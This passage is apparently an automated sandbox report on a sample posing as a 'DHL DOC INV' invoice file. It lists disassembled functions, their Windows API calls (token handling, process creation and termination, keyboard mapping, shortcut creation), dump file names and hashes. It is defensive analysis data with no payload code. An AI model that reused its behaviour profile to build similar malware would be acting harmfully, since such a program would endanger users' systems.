                                                                                                                        • CoCreateInstance.OLE32(003CFCF8,00000000,00000001,003CFB68,?), ref: 003A59AE
                                                                                                                        • CoUninitialize.OLE32 ref: 003A59CC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                                                        • String ID: .lnk
                                                                                                                        • API String ID: 3172280962-24824748
                                                                                                                        • Opcode ID: 16761ed8ab8b31bf09243bd1ef06638f0d642bfc6690dc3a2a852c1ea42b6911
                                                                                                                        • Instruction ID: d3c0d65fb048b0ee25f710c8d47b7eea940051800bd8d6434b0169704944416c
                                                                                                                        • Opcode Fuzzy Hash: 16761ed8ab8b31bf09243bd1ef06638f0d642bfc6690dc3a2a852c1ea42b6911
                                                                                                                        • Instruction Fuzzy Hash: BDD152756087019FC716DF24C480A2ABBE5FF8A720F15895DF88A9B361DB31EC45CB92
                                                                                                                        Function 0039175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00390FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00390FCA
                                                                                                                          • Part of subcall function 00390FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00390FD6
                                                                                                                          • Part of subcall function 00390FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00390FE5
                                                                                                                          • Part of subcall function 00390FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00390FEC
                                                                                                                          • Part of subcall function 00390FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00391002
                                                                                                                        • GetLengthSid.ADVAPI32(?,00000000,00391335), ref: 003917AE
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 003917BA
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 003917C1
                                                                                                                        • CopySid.ADVAPI32(00000000,00000000,?), ref: 003917DA
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00391335), ref: 003917EE
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 003917F5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3008561057-0
                                                                                                                        • Opcode ID: 286da6f94cdc82ced2c6b8b0fd3a8b725a8a6173d396e4c535e8c5e9f1e4ff82
                                                                                                                        • Instruction ID: 444dcba57190ea6bcf381bbb112bd986a2362c892acf718935e5cf20a67283c6
                                                                                                                        • Opcode Fuzzy Hash: 286da6f94cdc82ced2c6b8b0fd3a8b725a8a6173d396e4c535e8c5e9f1e4ff82
                                                                                                                        • Instruction Fuzzy Hash: EC11A932A20206FFDF229FA5CC49FAE7BADEB41355F144018F486E7220C736A940CB60
                                                                                                                        Function 003914CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 003914FF
                                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00391506
                                                                                                                        • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00391515
                                                                                                                        • CloseHandle.KERNEL32(00000004), ref: 00391520
                                                                                                                        • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0039154F
                                                                                                                        • DestroyEnvironmentBlock.USERENV(00000000), ref: 00391563
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1413079979-0
                                                                                                                        • Opcode ID: 35feb44f80e7b52634de46ea23375a39a5290d811f14582e2264ac2bb4a3fe3f
                                                                                                                        • Instruction ID: dc2282a5aad6c3d26b2b6630ee3ab2207c12f474cb2805b03877d4f0cf9e2bbe
                                                                                                                        • Opcode Fuzzy Hash: 35feb44f80e7b52634de46ea23375a39a5290d811f14582e2264ac2bb4a3fe3f
                                                                                                                        • Instruction Fuzzy Hash: A111147250024AABDF128FA8ED49FDA7BADFB49744F064025FA09A2060C375DE61DB60
                                                                                                                        Function 00353382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(?,?,00353379,00352FE5), ref: 00353390
                                                                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0035339E
                                                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 003533B7
                                                                                                                        • SetLastError.KERNEL32(00000000,?,00353379,00352FE5), ref: 00353409
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLastValue___vcrt_
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3852720340-0
                                                                                                                        • Opcode ID: 995797ac360642b0e60d7f4eb7c93153471c5c3f61bee80cc653904dc1028a51
                                                                                                                        • Instruction ID: 58bc309685bb793319ab707287d7bba639b618725c3d9d159c6f7d406e056b3c
                                                                                                                        • Opcode Fuzzy Hash: 995797ac360642b0e60d7f4eb7c93153471c5c3f61bee80cc653904dc1028a51
                                                                                                                        • Instruction Fuzzy Hash: E2012436619316BEE62727757DC5DA72A98EB053FBB21022DFC10891F0EF218D0E9648
                                                                                                                        Function 00362D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(?,?,00365686,00373CD6,?,00000000,?,00365B6A,?,?,?,?,?,0035E6D1,?,003F8A48), ref: 00362D78
                                                                                                                        • _free.LIBCMT ref: 00362DAB
                                                                                                                        • _free.LIBCMT ref: 00362DD3
                                                                                                                        • SetLastError.KERNEL32(00000000,?,?,?,?,0035E6D1,?,003F8A48,00000010,00334F4A,?,?,00000000,00373CD6), ref: 00362DE0
                                                                                                                        • SetLastError.KERNEL32(00000000,?,?,?,?,0035E6D1,?,003F8A48,00000010,00334F4A,?,?,00000000,00373CD6), ref: 00362DEC
                                                                                                                        • _abort.LIBCMT ref: 00362DF2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$_free$_abort
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3160817290-0
                                                                                                                        • Opcode ID: 5b97de697c8b924271ceb7415dfe7c41530f44d85bc381115350a52499566e01
                                                                                                                        • Instruction ID: d4b2789fe566684b7fb478adc3dbb381a3d299b34546a53839dc7897a8ef3223
                                                                                                                        • Opcode Fuzzy Hash: 5b97de697c8b924271ceb7415dfe7c41530f44d85bc381115350a52499566e01
                                                                                                                        • Instruction Fuzzy Hash: 9CF0C835A44E0167C2132738BD1AE6F255DAFC37A1F27C418F838DA1DEEF3498114260
                                                                                                                        Function 003C8A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00349639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00349693
                                                                                                                          • Part of subcall function 00349639: SelectObject.GDI32(?,00000000), ref: 003496A2
                                                                                                                          • Part of subcall function 00349639: BeginPath.GDI32(?), ref: 003496B9
                                                                                                                          • Part of subcall function 00349639: SelectObject.GDI32(?,00000000), ref: 003496E2
                                                                                                                        • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 003C8A4E
                                                                                                                        • LineTo.GDI32(?,00000003,00000000), ref: 003C8A62
                                                                                                                        • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 003C8A70
                                                                                                                        • LineTo.GDI32(?,00000000,00000003), ref: 003C8A80
                                                                                                                        • EndPath.GDI32(?), ref: 003C8A90
                                                                                                                        • StrokePath.GDI32(?), ref: 003C8AA0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 43455801-0
                                                                                                                        • Opcode ID: 2a720f713fc64bc7fa54cbafd882cfda3dcc587829b0eedaa337a2aaf5344e61
                                                                                                                        • Instruction ID: a85a6b7708529a49cf51765b60a530242981fe495e23f79403b0cbeeabdfafc8
                                                                                                                        • Opcode Fuzzy Hash: 2a720f713fc64bc7fa54cbafd882cfda3dcc587829b0eedaa337a2aaf5344e61
                                                                                                                        • Instruction Fuzzy Hash: 3E110976400118FFDB129F90DC88FEA7F6CEB08350F048026FA599A1A1C771AE55DFA0
                                                                                                                        Function 003951FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetDC.USER32(00000000), ref: 00395218
                                                                                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 00395229
                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00395230
                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00395238
                                                                                                                        • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0039524F
                                                                                                                        • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00395261
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CapsDevice$Release
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1035833867-0
                                                                                                                        • Opcode ID: d806107469f5aec186abb75e1256f14c3a2f2d278d135f14969df1e244741ba0
                                                                                                                        • Instruction ID: 7cea885f61d66a39d5c59e428a735347cd046af2417992d790f2ab0254710616
                                                                                                                        • Opcode Fuzzy Hash: d806107469f5aec186abb75e1256f14c3a2f2d278d135f14969df1e244741ba0
                                                                                                                        • Instruction Fuzzy Hash: B2014475A01714BBEF116BA59D49E5EBF78FB44751F084465FA08EB281D6709810CB60
                                                                                                                        Function 00331BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00331BF4
                                                                                                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 00331BFC
                                                                                                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00331C07
                                                                                                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00331C12
                                                                                                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 00331C1A
                                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00331C22
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Virtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4278518827-0
                                                                                                                        • Opcode ID: 1dbf9536b93b398a80692d7e75a7a6eecf7ece35a36c7c4af1574c6ef35f3cc6
                                                                                                                        • Instruction ID: ee8bdd0a28db86e969ce8904682e86a5bc5c0dc111bfc0b855cc15b71d0c14ff
                                                                                                                        • Opcode Fuzzy Hash: 1dbf9536b93b398a80692d7e75a7a6eecf7ece35a36c7c4af1574c6ef35f3cc6
                                                                                                                        • Instruction Fuzzy Hash: F1016CB09027597DE3008F5A8C85B52FFA8FF19354F04411BD15C47A41C7F5A864CBE5
                                                                                                                        Function 0039EB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0039EB30
                                                                                                                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0039EB46
                                                                                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 0039EB55
                                                                                                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0039EB64
                                                                                                                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0039EB6E
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0039EB75
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 839392675-0
                                                                                                                        • Opcode ID: fa25b775629497eb7d4134999facb2fb21b837184c1e7ac2448730284f4eaf0d
                                                                                                                        • Instruction ID: f1f1b056a8e0babc836813d6356f38e12b87ef5635e010ae369e9deb46df2eda
                                                                                                                        • Opcode Fuzzy Hash: fa25b775629497eb7d4134999facb2fb21b837184c1e7ac2448730284f4eaf0d
                                                                                                                        • Instruction Fuzzy Hash: 45F0BE72610158BBE7225B639C0EEEF7E7CEFCAB15F041158F605D1090D7A02A01C7B4
                                                                                                                        Function 00387439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetClientRect.USER32(?), ref: 00387452
                                                                                                                        • SendMessageW.USER32(?,00001328,00000000,?), ref: 00387469
                                                                                                                        • GetWindowDC.USER32(?), ref: 00387475
                                                                                                                        • GetPixel.GDI32(00000000,?,?), ref: 00387484
                                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 00387496
                                                                                                                        • GetSysColor.USER32(00000005), ref: 003874B0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 272304278-0
                                                                                                                        • Opcode ID: 799e3b8fc598453bc473c9f9c9a9a83cac68006597b47f545a5cc33f3bb8d383
                                                                                                                        • Instruction ID: 7dea8eba5a749d9861e6462db8ca9d42b8288cd6998699b0e358afc542bc190a
                                                                                                                        • Opcode Fuzzy Hash: 799e3b8fc598453bc473c9f9c9a9a83cac68006597b47f545a5cc33f3bb8d383
                                                                                                                        • Instruction Fuzzy Hash: B6018F31410205EFDB129FA5DD08FEA7BBAFB04311F251060F919E30A1CB312D51EB10
                                                                                                                        Function 00391874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0039187F
                                                                                                                        • UnloadUserProfile.USERENV(?,?), ref: 0039188B
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00391894
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 0039189C
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 003918A5
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 003918AC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 146765662-0
                                                                                                                        • Opcode ID: 0922549d908556d086e41ceee048fe877e8cce9c1cdda9796075a0cbd9730f2a
                                                                                                                        • Instruction ID: 17fb4ca6e805e2ac1d0cd051674226edfa2a07651f3670239db25e32117c85bf
                                                                                                                        • Opcode Fuzzy Hash: 0922549d908556d086e41ceee048fe877e8cce9c1cdda9796075a0cbd9730f2a
                                                                                                                        • Instruction Fuzzy Hash: D5E0C236414501BBDB025BA2ED0CD0ABB2DFB49B22B109220F229C1470CB32A420DB50
                                                                                                                        Function 0033BBE0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 232COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __Init_thread_footer.LIBCMT ref: 0033BEB3
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Init_thread_footer
                                                                                                                        • String ID: D%@$D%@$D%@$D%@D%@
                                                                                                                        • API String ID: 1385522511-1921936383
                                                                                                                        • Opcode ID: c7dc66ac17504900feead5880d997ebd216b111b2e652e32b198f9a5f7f8413f
                                                                                                                        • Instruction ID: bb118b0d89e2df1c9824a903c518a52dd3e23ea8869386db254085b30d89e7b3
                                                                                                                        • Opcode Fuzzy Hash: c7dc66ac17504900feead5880d997ebd216b111b2e652e32b198f9a5f7f8413f
                                                                                                                        • Instruction Fuzzy Hash: 11915975A0020ADFCB29CF58C4D06AAF7F5FF58314F25816ADA45AB350D771AA81CB90
                                                                                                                        Function 003B7B7E Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 230COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00350242: EnterCriticalSection.KERNEL32(0040070C,00401884,?,?,0034198B,00402518,?,?,?,003312F9,00000000), ref: 0035024D
                                                                                                                          • Part of subcall function 00350242: LeaveCriticalSection.KERNEL32(0040070C,?,0034198B,00402518,?,?,?,003312F9,00000000), ref: 0035028A
                                                                                                                          • Part of subcall function 00339CB3: _wcslen.LIBCMT ref: 00339CBD
                                                                                                                          • Part of subcall function 003500A3: __onexit.LIBCMT ref: 003500A9
                                                                                                                        • __Init_thread_footer.LIBCMT ref: 003B7BFB
                                                                                                                          • Part of subcall function 003501F8: EnterCriticalSection.KERNEL32(0040070C,?,?,00348747,00402514), ref: 00350202
                                                                                                                          • Part of subcall function 003501F8: LeaveCriticalSection.KERNEL32(0040070C,?,00348747,00402514), ref: 00350235
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                                                                                        • String ID: +T8$5$G$Variable must be of type 'Object'.
                                                                                                                        • API String ID: 535116098-1932661733
                                                                                                                        • Opcode ID: 6ccb159725d1aff5f959ad17c2ec580684db8785befece4eb109539b43d3eca4
                                                                                                                        • Instruction ID: 8e37fc7e0bd031957180e0d6a515cccca447c56945e448e6fbb56f30c2e63b85
                                                                                                                        • Opcode Fuzzy Hash: 6ccb159725d1aff5f959ad17c2ec580684db8785befece4eb109539b43d3eca4
